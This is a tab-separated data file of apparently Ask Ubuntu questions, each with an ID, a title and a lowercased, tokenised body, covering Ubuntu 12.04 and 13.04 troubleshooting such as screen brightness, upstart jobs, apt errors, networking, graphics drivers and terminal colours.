356860	how to control screen brightness ubuntu 12.04 64bit in imac 2011	i have installed ubuntu 12.04 in a 2011 imac computer . everything is working properly , but i 'm struggling with the control of screen brightness . i have tried several solutions and none of them work . the only partial solution i have found is configuring the bright adjustment keys with compiz settings manager : accessibility > opacity > brightness and saturation > brightness tab . it works , but only adjusts the brightness of the foreground window and not the whole screen 's . here are some screenshots : screenshots does anybody know what 's happening ? any solution ? thanks in advance ! : )
356862	how to change login screen background picture ubuntu 13.04 64bit	i am trying to customize my new install of ubuntu 13.04 64bit . i have changed my desktop wallpaper and i have enabled and changed the logon sound . but now im stuck . i want to change the logon screen wallpaper . at the moment the logon screen background is just a purple colour . i have used the ubuntu tweak tool to try and change the logon screen background but no matter what picture i select it dose not apply and it stays the same purple colour . as my home folders are encrypted i have moved my image i want to use for the logon screen background to /usr/share/backgrounds and i have called the image login.png i have also made a new directory /wallpapers and put a copy in there as well . i have then tried to use different terminal commands but nothing seems to be working . please can anyone help me out .
356863	upstart is not finding my job	hi there i have made the following job : description `` emacs daemon '' start on runlevel [ 2345 ] stop on runlevel [ ! 2345 ] expect daemon respawn respawn limit 10 5 # respawn up to 10 times , waiting 5 seconds each time pre-start script echo `` starting emacs daemon ... '' > /home/kabelo/desktop/emacs.log end script pre-stop script emacsclient -n -e ' ( save-persistent-scratch ) ' end script exec start-stop-daemon -- start -- chuid kabelo -- exec /usr/bin/emacs -- -- daemon -u kabelo when i placd in in ~/.config/upstart then the commands sudo start emacs , start emacs , print the error , start : unknown job : emacs . the same error is printed when i put it in both $ xdg_config_dirs , in /usr/share/upstart/sessions , in ~/.init . now i 'm too fed up to try making a directory , calling it $ xdg_config_home and putting it there , since i 'm pretty certain it would work . why is n't the script working no matter where i put it . note that i want it as a `` session job '' so that i can start it without sudo as documented in the docs .
356864	no root file system is defined/ seperate partition issue	so , i tried installing ubuntu 13.04 onto a separate partition . i had the option to install to the partition i created in administrative tools in windows but i get this no root file system defined error when i try to install to it . any help would be great , thank you .
356865	ubuntu software center and apt-get wo n't allow me to upgrade or install software	i have been having some annoying issues due to downloading on ubuntu and terminal . i understand and have seen all questions and answers of my issue and `` none '' have worked at all . i am currently using version 13.04 . every time i try going into the terminal i get errors via apt-get update : e : could not open lock file /var/lib/apt/lists/lock - open ( 13 : permission denied ) e : unable to lock directory /var/lib/apt/lists/ e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? jack @ jack-m17x : ~ $ sudo apt-get update shows up with : err http : //gb.archive.ubuntu.com raring release.gpg could not connect to localhost:4001 ( 127.0.0.1 ) . - connect ( 111 : connection refused ) w : some index files failed to download . they have been ignored , or old ones used instead . '' ( more links are displayed with `` err '' via localhost . my internet is fine running at 120mbs . and when trying to install something on the software centre i get failed in install package check your internet connection . i 've mostly tried all the answers and tricks given on the forums and nothing seems to work . furthermore , i have tried re-installing ubuntu , and it can not find the kernel or just wo n't boot up from using my usb .
356867	connect android to apache server	i want to preview my website on my android phone . so i tried to connect via wi-fi . i gave the phone a static ip ( 192.168.0.2 ) and the server 's wlan card the ip 192.168.0.1 . and i configured apache to listen on 192.168.0.1 . i made an exception for the firewall , also . so this is what i did : network/interfaces : auto wlan0 iface wlan0 inet static address 192.168.0.1 netmask 255.255.255.0 wireless-essid something wireless-mode ad-hoc apache2/ports.conf : namevirtualhost 192.168.0.1:80 listen 192.168.0.1:80 but i 'm not really sure what to do since i am new to this . i do n't have a router in between , so i guess it should be adhoc net . please ask for further information that may help
356871	better `` system settings '' search functionality ... ?	this should get me some results , no ? i know i saw some settings related to `` classic '' somewhere in there .
356874	how do i download kppp-debs from within windows ?	how do i download kppp even if i can only connect to the internet via dial-up connection ? in other words : is there a way to get kppp while windows is running and install it later on ubuntu ?
356878	`` missing operating system '' error from bootloader on a mac	i used a usb image , and followed all the instructions on ubuntu.com . when i try restart it does not have a linux or ubuntu option . it has a windows option but i do n't have windows installed , if i click on that to open it says `` missing operating operating system . any help would be greatly appreciated thanks
356880	freenx , nomachine , refusing connection , ubuntu 12.04	i 've installed the nomachine freenx system on a number of ubuntu systems but their latest version ( installs with a single file rather than the previous , client , node , server trio ) will not allow me to connect to the server . my ssh connection works fine , i.e . i can ssh to the server but the nx client receives the following message nx > 203 nxssh running with pid : 4512 nx > 285 enabling check on switch command nx > 285 enabling skip of ssh config files nx > 285 setting the preferred nx options nx > 200 connected to address : 192.168.1.59 on port : 22 nx > 202 authenticating user : nx nx > 208 using auth method : publickey nx > 204 authentication failed . any ideas ? thanks
356883	setup pppoe over ethernet card	how to setup pppoe connection over wired dsl connection ( ethernet ) ? i 'm using ubuntu 12 dual-booting with windows . it runs ok. on windows
356886	getting network adress , but no internet	i have ubuntu server 12.04 lts and i have a network ip address but no internet connection . lampp , ssh , work fine over the network but i ca n't talk to anything outside of my network . output from ifconfig eth0 link encap : ethernet hwaddr bc:5f : f4:90:44 : fa inet addr:192.168.1.150 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :be5f : f4ff : fe90:44fa/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:232675 errors:0 dropped:0 overruns:0 frame:0 tx packets:56829 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:73760265 ( 73.7 mb ) tx bytes:7406332 ( 7.4 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:63887 errors:0 dropped:0 overruns:0 frame:0 tx packets:63887 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:5215210 ( 5.2 mb ) tx bytes:5215210 ( 5.2 mb ) virbr0 link encap : ethernet hwaddr 32:31 : e1:32:89:75 inet addr:192.168.122.1 bcast:192.168.122.255 mask:255.255.255.0 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) output from route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 100 0 0 eth0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 eth0 192.168.1.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 192.168.122.0 0.0.0.0 255.255.255.0 u 0 0 0 virbr0
356887	mount vmware shared folder to ubuntu 12.04.3	i tried to create a shared folder to my ubuntu 12.04.3 vm using vmware 5 from my mac but i do n't see the folder anywhere . i 've tried to use some commands as suggested here and here , but nothing is still showing ... i just get the error : error : can not canonicalize mount point : no such file or directory so i make the folder i 'm trying to mount to or just try to mount directly to my home folder and get this error now : error : can not mount filesystem : no such device any help is appreciated .
356890	how to shut down cleanly on signal from ups ?	sp , our little ubuntu server already killed a hard drive from a sudden power failure when the ips wenr dead . the ups sends a network signal to the lan , but i do n't know how to get ubuntu to recognize the signal from the ups ?
356891	how do i solve this bluetooth programming problem ?	i 've been trying to get bluez and pybluez to work on my 12.04 ubuntu desktop . everything installed correctly , but i can never find any of my devices : > > > import bluetooth > > > bluetooth.discover_devices ( ) [ ] > > > strangely , i am able to pair my devices using the system dialogues , so i know my hardware is working correctly . where should i start to try to fix this problem ?
356892	dragging and dropping from browser to nautilus saves link instead of file , how to change default action ?	when i drag and drop -- say an image -- from any internet browser to the desktop or any folder under nautilus , it will save it as a link . now if i hold down ctrl while i drag and drop , it will actually save the file . how do i swap it so that the default saves the file and i not a link ?
356894	/usr/bin/cmake : is a directory . not able to grab the version of cmake ?	i just have installed cmake in my ubuntu machine.. so when i do whereis cmake , it gives me the actual path username @ phx7b02c-ee1b : ~/cmake/cmake-2.8.11 $ whereis cmake cmake : /usr/bin/cmake but whenever i try to get the version of cmake , i always get the below message.. i am not sure what wrong i am doing here ? username @ phx7b02c-ee1b : ~/cmake/cmake-2.8.11 $ /usr/bin/cmake -- version -bash : /usr/bin/cmake : is a directory can anyone help me here ?
356897	why is ubuntu 10.10 refusing to upgrade ?	i had to reformat my drive because my computer does not support 12.04 or higher . now when i go to the update manager it is not recognising a internet connection . i have an internet connection and it works fine this is confusing . my computer is a satellite a10 toshiba laptop with a 75g drive and a 32 bit processor . all i want is for this computer is for it to upgrade to 11.10 so i can run it on my tv via vga adapter . 10.10 does not support this feature without going batty on me . any answers would be greatly appreciated .
356901	fatal error : log4cxx/logger.h : no such file or directory	i am getting this error whenever i am compiling my c++ code from command line . fatal error : log4cxx/logger.h : no such file or directory is there any easy way to download the log4cxx package from the command line using apt get ? i do found the wiki which talks about downloading it and compiling it step by step.. but is there any way from apt get that we can use ? update : - this is what i am getting while install sudo apt-get install liblog4cxx10-dev some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : liblog4cxx10-dev : depends : libaprutil1-dev but it is not going to be installed e : broken packages what wrong i am doing here ? any thoughts ?
356902	why does n't this show the hidden files/folders ?	i was looking through my system with du -sch ./* to find the big useless files i may have stockpiled with no reason , when i found this : $ du -sch ./* du : can not read directory ‘./drbunsen/.gvfs’ : permission denied du : can not read directory ‘./drbunsen/.cache/dconf’ : permission denied 18g ./drbunsen 18g total $ cd drbunsen/ $ du -sch ./* 601m ./desktop 20k ./documents 598m ./downloads 4.0k ./flash 4.0k ./music 8.0m ./pictures 4.0k ./public 4.0k ./templates 4.0k ./ubuntu one 8.0k ./videos 11g ./virtualbox vms 6.9m ./workspace 12g total how do i make hidden files visible ? du -sch ./ . * gives the same result as du -sch ./* . thanks in advance
356907	internet is insanely slow on home network only with one computer	i 've got a really weird problem . i just switched from at & t to comcast . since i switched modems i had to reconfigure my wireless network . i got it done no problem , but now on the computer i set up the network with i can barely connect to the internet . i can connect to other networks using this partition ; i 'm doing it right now using my nexus 4 as a hotspot , which is connected to the home wifi . i 've also got a linux mint computer on the network that works well . i 've got another home theater computer and small windows 7 computer connected no problem . the only trouble is on my laptop running 12.04 lts . even in my windows 7 partition on that same laptop i can connect no problem . i 've tried deleting the connection from my saved networks and trying to reconnect to it , but no dice . any thoughts as to what might be causing the trouble ? i 'm using an asus k55vd . thanks !
356910	are micro/ultra dvd drives ( i.e . those without drawers ) supported ?	i have a system with a matsushita/panasonic optical drive with no drawer i.e . it should detect when a disk is inserted and ingests it automatically . during boot , i can sucessfully insert a disk , however , once ubuntu is running , the drive no longer detects and ingests a disk . nevertheless , the drive is working as any disk inserted during boot can be played , etc . i am new to linux so struggling a bit to find relevant diagnostics information . if a disk is inserted during boot , i can eject it with the command eject ; however , inspite of a sucessfull ejection i get an error : eject : unable to eject , last error : inappropriate ioctl for device if i insert a disk to the point where it would normally be ingested and use the command eject -t , the disk is not ingested and i have an error : eject : cd-rom tray close command failed : input/output error lshw shows the drive as correctly identified : *-cdrom description : dvd-ram writer product : dvd-ram uj-875s vendor : matshita physical id : 0.1.0 bus info : scsi @ 0:0.1.0 logical name : /dev/cdrom logical name : /dev/cdrw logical name : /dev/dvd logical name : /dev/dvdrw logical name : /dev/sr0 version : 1.00 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=open do my symptoms point to a driver issue ? in which case how can i ensure that i have the right driver and change it if necessary . has anyone had a similar problem ? can anyone tell me where i can find out more about the reported i/o errors ?
356913	ubuntu 12.04.03 64 bit installer hangs on hp envy 17	i 've disabled secure boot , and enabled legacy boot in bios before boot the system from a ubuntu cd , the installer hangs after printing out this line : stopping enable remaining boot-time encrypted block devices [ ok ] how to solve this problem ?
356921	mymoney , how to import quicken qdf files	where can i find help with mymoney ? specifically about importing quicken qdf files/backups . i 'm looking for a user group , but ca n't find one .
356925	unable to install skype	i am unable to install skype . everytime i get this error : bilal @ bilal-hp-probook-4520s : ~ $ sudo dpkg -i getskype-* ( reading database ... 143630 files and directories currently installed . ) preparing to replace skype 4.2.0.11-1 ( using getskype-linux-beta-ubuntu-32 ) ... unpacking replacement skype ... dpkg : dependency problems prevent configuration of skype : skype depends on libqt4-webkit ( > = 4:4.5.3 ) ; however : package libqt4-webkit is not installed . skype depends on libxss1 ; however : package libxss1 is not installed . dpkg : error processing skype ( -- install ) : dependency problems - leaving unconfigured processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... processing triggers for hicolor-icon-theme ... errors were encountered while processing : skype
356927	local servers ( behind nat ) on vpn with email servers and sync with a central email server open to internet	what i have i have a number of linux ( ubuntu ) servers ( 20 as of now but may grow over time to hundreds ) connected to each other via private vpn ( openvpn ) which serve intranet web application ( apache and php ) in their respective local network . users in these local networks do not have internet and they use these servers for few services . a lot of such servers can be behind nat , or dial up internet . users of the servers are not connected to vpn or internet . their only access within the local network is that server . there is one central server in the vpn which also have a public static ip and a domain name pointed to it . the same application is also served by the central server for those users ( road warriors ) who wish to connect from public internet . in case of my web application i sync the changes between a local server and the central server , whenever possible . i am using mongodb for data storage . i have a unique name for every server which can be used for making fqdn , but i do n't have a dns system in place as of now . what i need i also wish to add an email service [ collaborative suite if possible ] to these servers , in such a way that a local server can facilitate email communication within the local network and also sync with the central server [ current vpn host ] so that a user of a local server connecting via internet ( road warrior ) is still able to exchange emails . some amount of delay will be acceptable for sync to complete across servers . the service should be transparent . i do not wish my users to use different email addresses or have different imap inbox . constraints i have user 's credentials in mongodb databases in local servers and synced to central server . these credentials can be accessed via a php rest api . if required i can put hooks on the api create/update events to update the credentials in any required format ( ldap , mysql , memcache or something else ) , but i do n't know about replicating in reverse direction . answers i seek such a system possible with email replication along with imap inbox ? [ yes/no ] will i need a dns setup ? [ yes/no -- details if possible ] is there a suite/software ( which integrates , mail transfer agent , mail delivery agent and webmail ) for such multi tier scenario , which i can use for such a setup ? such as zimbra ? [ which suite/software ] or i have to use a stack of mail transfer agent ( postfix/sendmail/exim ) , mail delivery agent ( sendmail/dovecot/cyrus/courier ) and webmail ( squirrel/openwebmail ) ? [ yes/no and which combination will work for such a system - details if possible ] *note - i am not asking how to setup . i am just asking what 's possible and which tools to use . a different but related question right now i have users in every server in mongodb . at central server i keep a database for every server ( i have unique names for every server which can be used to make fqdn ) . i identify users at central server like this unique_userid_at_local @ local_server_name can i have a multi tier ldap setup where i can keep the users in both local and central server and keep both in sync ? is yes which software/stack will work best ? update after a month of search i have following update - 1 . yes its possible . 2 . yes . dns is required , for internal named mail routing 3 . no suite will help . the only remaining question now is this one - what is the best stack for such a system and why mta - postfix/sendmail/exim delivery - sendmail/dovecot/cyrus/courier **note webmail isnt an issue and can be ignored .
356931	how to record sound with audacity in ubuntu studio 13.04	please help me figure out the problem with my sound problem . i have tried a lot of solutions , non of which seems to work for my case . here is the audio device viewed by audacity : ============================== default capture device number : 15 default playback device number : 15 ============================== device id : 0 device name : hda intel : alc662 rev1 analog ( hw:0,0 ) host name : alsa input channels : 2 output channels : 6 low input latency : 0,011610 low output latency : 0,011610 high input latency : 0,046440 high output latency : 0,046440 supported rates : 44100 48000 96000 ============================== device id : 1 device name : hda intel : alc662 rev1 analog ( hw:0,2 ) host name : alsa input channels : 2 output channels : 0 low input latency : 0,011610 low output latency : -1,000000 high input latency : 0,046440 high output latency : -1,000000 supported rates : ============================== device id : 2 device name : hda nvidia : hdmi 0 ( hw:1,3 ) host name : alsa input channels : 0 output channels : 8 low input latency : -1,000000 low output latency : 0,011610 high input latency : -1,000000 high output latency : 0,046440 supported rates : 32000 44100 48000 88200 96000 176400 192000 ============================== device id : 3 device name : hda nvidia : hdmi 0 ( hw:1,7 ) host name : alsa input channels : 0 output channels : 8 low input latency : -1,000000 low output latency : 0,011610 high input latency : -1,000000 high output latency : 0,046440 supported rates : 32000 44100 48000 88200 96000 176400 192000 ============================== device id : 4 device name : hda nvidia : hdmi 0 ( hw:1,8 ) host name : alsa input channels : 0 output channels : 8 low input latency : -1,000000 low output latency : 0,011610 high input latency : -1,000000 high output latency : 0,046440 supported rates : 32000 44100 48000 88200 96000 176400 192000 ============================== device id : 5 device name : hda nvidia : hdmi 0 ( hw:1,9 ) host name : alsa input channels : 0 output channels : 8 low input latency : -1,000000 low output latency : 0,011610 high input latency : -1,000000 high output latency : 0,046440 supported rates : 32000 44100 48000 88200 96000 176400 192000 ============================== device id : 6 device name : sysdefault host name : alsa input channels : 128 output channels : 128 low input latency : 0,042653 low output latency : 0,042653 high input latency : 0,046440 high output latency : 0,046440 supported rates : 8000 9600 11025 16000 22050 32000 44100 48000 88200 176400 ============================== device id : 7 device name : front host name : alsa input channels : 0 output channels : 6 low input latency : -1,000000 low output latency : 0,011610 high input latency : -1,000000 high output latency : 0,046440 supported rates : 44100 48000 96000 ============================== device id : 8 device name : surround40 host name : alsa input channels : 0 output channels : 6 low input latency : -1,000000 low output latency : 0,011610 high input latency : -1,000000 high output latency : 0,046440 supported rates : 44100 48000 96000 ============================== device id : 9 device name : surround41 host name : alsa input channels : 0 output channels : 128 low input latency : -1,000000 low output latency : 0,011610 high input latency : -1,000000 high output latency : 0,046440 supported rates : 44100 48000 96000 ============================== device id : 10 device name : surround50 host name : alsa input channels : 0 output channels : 128 low input latency : -1,000000 low output latency : 0,011610 high input latency : -1,000000 high output latency : 0,046440 supported rates : 44100 48000 96000 ============================== device id : 11 device name : surround51 host name : alsa input channels : 0 output channels : 6 low input latency : -1,000000 low output latency : 0,011610 high input latency : -1,000000 high output latency : 0,046440 supported rates : 44100 48000 96000 ============================== device id : 12 device name : surround71 host name : alsa input channels : 0 output channels : 6 low input latency : -1,000000 low output latency : 0,011610 high input latency : -1,000000 high output latency : 0,046440 supported rates : 44100 48000 96000 ============================== device id : 13 device name : pulse host name : alsa input channels : 32 output channels : 32 low input latency : 0,011610 low output latency : 0,011610 high input latency : 0,046440 high output latency : 0,046440 supported rates : 8000 9600 11025 12000 15000 16000 22050 24000 32000 44100 48000 88200 96000 176400 192000 ============================== device id : 14 device name : dmix host name : alsa input channels : 0 output channels : 2 low input latency : -1,000000 low output latency : 0,042667 high input latency : -1,000000 high output latency : 0,042667 supported rates : 48000 ============================== device id : 15 device name : default host name : alsa input channels : 32 output channels : 32 low input latency : 0,011610 low output latency : 0,011610 high input latency : 0,046440 high output latency : 0,046440 supported rates : 8000 9600 11025 12000 15000 16000 22050 24000 32000 44100 48000 88200 96000 176400 192000 ============================== selected capture device : 13 - pulse selected playback device : 13 - pulse supported rates : 8000 9600 11025 12000 15000 16000 22050 24000 32000 44100 48000 88200 96000 176400 192000 ============================== available mixers : ============================== available capture sources : 0 - mic:0 1 - line:0 2 - mic:1 3 - line:1 ============================== available playback volumes : 0 - master:0 1 - pcm:0 2 - front:0 3 - surround:0 4 - center:0 5 - lfe:0 6 - line:0 7 - mic:0 8 - mic boost:0 ============================== capture volume is native playback volume is native i have tried with arecord test.wav and still no result . testing it in windows all works normally
356932	asus eee pc 1015 pn gpu question	i am using ubuntu 13.04 ( 64 bit ) on my netbook , the asus 1015 pn . the netbook has a built-in intel gma and a nvidia ion gpu . after a fresh install of the os , ubuntu uses the dedicated nvidia ion gpu by default . as suggested by ubuntu , i am using the open source drivers for the nvidia gpu , which work just fine , so i will continue to use them . questions : does ubuntu turn off the intel gpu automatically , because the nvidia gpu is being used , or does it remain activated ( wasting energy and creating more heat ) ? what is the most simple way to switch between the two gpu 's ? i do n't need optimus support , and i do n't want to experiment with bumblebee . i 'd just like to switch to the intel gpu from time to time . the nvidia card consumes too much energy on the go . thanks !
356933	libcurl4-gnutls-dev : depends : libldap2-dev but it is not going to be installed	i am trying to install curl in my ubuntu server as i was getting this error - fatal error : curl.h : no such file or directory below is the error - username @ phx7b02c-ee1b : ~ $ sudo apt-get install libcurl4-gnutls-dev reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libcurl4-gnutls-dev : depends : libldap2-dev but it is not going to be installed e : broken packages i am not sure what wrong i am doing here ? update : - my ubuntu version - username @ phx7b02c-ee1b : ~ $ uname -a linux phx7b02c-ee1b 2.6.35-22-server # 33-ubuntu smp sun sep 19 20:48:58 utc 2010 x86_64 gnu/linux
356936	is there a way to set the maas password via a preseed ?	as has been asked before ( here and here ) i need to set a password during commissioning for my nodes . i realize that ssh keys are set ( and i have one ) but i need to log in to the node directly as networking is not coming up properly . is there a way to change this in the preseed ?
356938	make an install disk based on your current installed os ?	so when i originally downloaded the ubuntu 13.04 iso and installed it i added many different apps to it , now i want to create an install disk with all my apps that originally did not come with it , gimp , inkscape , blender , ext , and the libs i have installed as well , xdotool for example , so i can install this on my laptop without having to manually install everything . effectively create my own distro in a sense for my computers .
356939	2 monitor setup , copied screen	i have two monitors for my pc . - this problem only started recently , up until a couple a days ago it was fine . i am using the latest open source nvidia driver . the problem is that the right screen in a duplicate of the left screen . how do i fix this so that i have one left screen and a separate right screen ?
356940	graphics card driver issues	hi i am writing this out of desperation . i 've spent the last 3 days trying to get ubuntu to work on a new machine i just built . here are my specs for the hardware . asus p5n-e sli mobo intel core 2 duo 2.4 ghz processor nvidia 8800 gt gfx card 2x 2gb adata ram 160gb hd first off i 'm a total linux noob and i got ubuntu , because i want to learn more about linux . i am running ubuntu 13.04 32 bit ( or want to run ) . the installation process works every time ( i think i 've installed it 9 times now ) . no problems during installation or updating or using any software for that matter . the problem lies with when i try to update my graphics driver . the open source ( default ) one works ok , other than that it does n't really allow me to use my graphics card to the fullest , but it does n't crash . after updating i restart my machine only to find that it crashes before ubuntu can fully start up . this happens every time . i 'm going insane ... i 've tried a bunch of different drivers and even some unofficial ones and i cant seem to get the right one or i 'm doing something completely wrong . i 've gone through a bunch of tutorials that i 've found on google without any luck . i think ubuntu is awesome but i 'm really losing interest in it because i 've wasted the last 3 days trying to get it working without any progress other than figuring out that its a graphics problem and linux is hard , but that 's why its fun ... i guess ... whatever . how do i get the graphics drivers to work on my machine ? i 've done the sudo get latest graphics thing ( i know its not the exact code for the terminal.. ) in the terminal like 5 times without it working ... i 've used the additional drivers in the ubuntu settings multiple times ( i 've tried the updates , 303 , 304 , 313 ) none work . i do n't know what to do . please help . i have also tried downloading the latest driver from the nvidia website but could n't get the .run file to work ... ( very noob at linux sorry ) . sorry if i sound a little annoyed in this message . its just i 've been trying sooo hard to get it to work and it does n't work every time i try . this is the last resort .
356946	can i watch youtube videos on ubuntu touch ?	if so , how ? is there an app available , or perhaps an installable package for watching in the browser ?
356947	can not load ubuntu through grub menu	okay , so i have the option to boot in bios through either uefi or legacy , if i load through uefi i am prompted by the grub menu to pick an os , and if i boot through legacy i load straight to ubuntu . ubuntu works when i boot through legacy , but in uefi when i choose ubuntu on the grub menu i am given a wubildr.mbr error , even though i installed ubuntu through a boot disk rather than wubi . any help ?
356949	bash : ./start.sh : permission denied & & ./start.sh : line 64 : .//wrighteagle : permission denied	hi i wan na to start my sever and my game to rcsoocersim but when i want to start the game and write in terminal ./start.sh bash : ./start.sh : permission denied i try and write chmod 700 *sh or chmod +x *sh and the result was > > > > > > > > > > > > > > > > > > > > > > wrighteagle goalie : 1 ./start.sh : line 58 : .//wrighteagle : permission denied > > > > > > > > > > > > > > > > > > > > > > wrighteagle player : 2 ./start.sh : line 64 : .//wrighteagle : permission denied > > > > > > > > > > > > > > > > > > > > > > wrighteagle player : 3 ./start.sh : line 64 : .//wrighteagle : permission denied > > > > > > > > > > > > > > > > > > > > > > wrighteagle player : 4 ./start.sh : line 64 : .//wrighteagle : permission denied > > > > > > > > > > > > > > > > > > > > > > wrighteagle player : 5 ./start.sh : line 64 : .//wrighteagle : permission denied > > > > > > > > > > > > > > > > > > > > > > wrighteagle player : 6 ./start.sh : line 64 : .//wrighteagle : permission denied > > > > > > > > > > > > > > > > > > > > > > wrighteagle player : 7 ./start.sh : line 64 : .//wrighteagle : permission denied > > > > > > > > > > > > > > > > > > > > > > wrighteagle player : 8 ./start.sh : line 64 : .//wrighteagle : permission denied > > > > > > > > > > > > > > > > > > > > > > wrighteagle player : 9 ./start.sh : line 64 : .//wrighteagle : permission denied > > > > > > > > > > > > > > > > > > > > > > wrighteagle player : 10 ./start.sh : line 64 : .//wrighteagle : permission denied > > > > > > > > > > > > > > > > > > > > > > wrighteagle player : 11 ./start.sh : line 64 : .//wrighteagle : permission denied > > > > > > > > > > > > > > > > > > > > > > wrighteagle coach ./start.sh : line 71 : .//wrighteagle : permission denied plz any help could be greatful tnx
356950	getting laptop boot screen on external monitor	i have my ubuntu desktop ( 13.04 ) installation setup for dual monitors ( one vga and one hdmi , built-in display off ) out of my laptop . this is working fine when i am logged in , however when i reboot the boot/login screen is only on my laptop screen . since i want to have the laptop close and tucked away , this is a problem . any suggestions on how to get this to work properly ? i tried a suggestion of adding a file to /etc/x11/xsession . i called it '98extmonitor ' and it had the following contents : xrandr -q | grep 'vga1 connected ' & & xrandr -- output lvds1 -- off -- output vga1 -- auto but that had no change in effect .
356952	why is ubuntu download hanging for hours ?	this is the fifth time in 3 nights i have started to download ubuntu-12.04.3-desktop-i386.iso . each time it downloads the first 20 - 24 % . then it hangs for hours with no progress ( i have even left this running unattended for up to 5 hours - no movement ) . i am not bothered particularly by the speed or lack of it . if it would just finish - i need this ubuntu version for a university course i have just started . co-incidentally windows has just downloaded 14 large updates in less than 4 minutes ... ..
356953	why am i seeing only 8 colors in terminal ( xterm ) ?	i 'm running xubuntu 13.04 and i want to use vim as my default editor for everything . i have downloaded many vim color schemas and tried them out , but all of them do n't look like the official screenshot . for example , vim 's own color schema - desert should look like this : but in my vim , many colors wo n't display , for example the background . so this means a fighting with xfce 's terminal and i ca n't force it to use 256 colors . the command tput colors gives me 8 . at the same time the code for ( ( x=0 ; x < =255 ; x++ ) ) ; do echo -e `` $ { x } : \033 [ 48 ; 5 ; $ { x } mcolor\033 [ 000m '' done shows me nice colors . it seems i missed something . if i run echo $ term i get xterm . it should be 'xterm-256color' when i try set term=xterm-256color and export term=xterm-256color then : echo $ term i get the message xterm-256color but after signout/signin , i 'm still not getting the right colors in vim . and i see the $ term is changed to xterm again . i added : if $ term == `` xterm-256color '' set t_co=256 endif and t_co=256 to my .vimrc file and it did n't seem to help . then i customized the xterm entries ; added this to ~/.xdefaults : *customization : -color xterm*termname : xterm-256color add this to ~/.xsession to apply to new terminals : if [ -f $ home/.xdefaults ] ; then xrdb -merge $ home/.xdefaults fi when i changed in preferences of terminal , emulate terminal environment , the xterm to xterm-256color i get the message : '*** vte *** : failed to load terminal capabilities from '/etc/termcap ' when i check /usr/share/vte/termcap/xterm , the file xterm-256color is missing . same in the folder xterm0.0 . i tried to find this file on the internet to download and put in the folder , but i could n't find it . this is driving me crazy the whole day ... does anyone have suggestions ?
356956	problem with netflix-desktop and xattr	i 'm having problems getting netflix-desktop to work on ubuntu 13.04 . at first when i tried to run it from terminal i got a message saying something along the lines of no module xattr . after installing xattr , i now get the message : it appears that you do not have extended file system attributes enabled . please enable the user_xattr option for your filesystem and try again . i 've found a few threads discussing this problem ( here , for example ) , most of which seem to agree to modify /etc/fstab/ to include user_xattr . i 've done this , but still get the same message . any ideas on what to do ? edit : this is the output when i do sudo mount /dev/sdb2 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/cgroup type tmpfs ( rw ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) gvfsd-fuse on /run/user/usrname/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=my_usrname ) and , incase it 's useful , the contents of /etc/fstab/ : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda2 during installation uuid=263e92a2-9998-4386-8d3b-3d6ea3c8c399 / ext4 errors=remount-ro , user_xattr 0 1 # swap was on /dev/sda3 during installation uuid=e34a5af0-13f0-40c4-987e-34ba143faba5 none swap sw 0 0 ~
356960	ubuntu do n't detect the wireless adapter on a hp dv6	i just partitioned my hard drive and installed ubuntu 12.04 , but it is not detecting any wireless signal . when i was trying ubuntu in wubi , everything worked though . here is the output from ifconfig : eth0 link encap : ethernet hwaddr 2c:41:38:5a : b4:22 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:128 errors:0 dropped:0 overruns:0 frame:0 tx packets:128 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:10208 ( 10.2 kb ) tx bytes:10208 ( 10.2 kb )
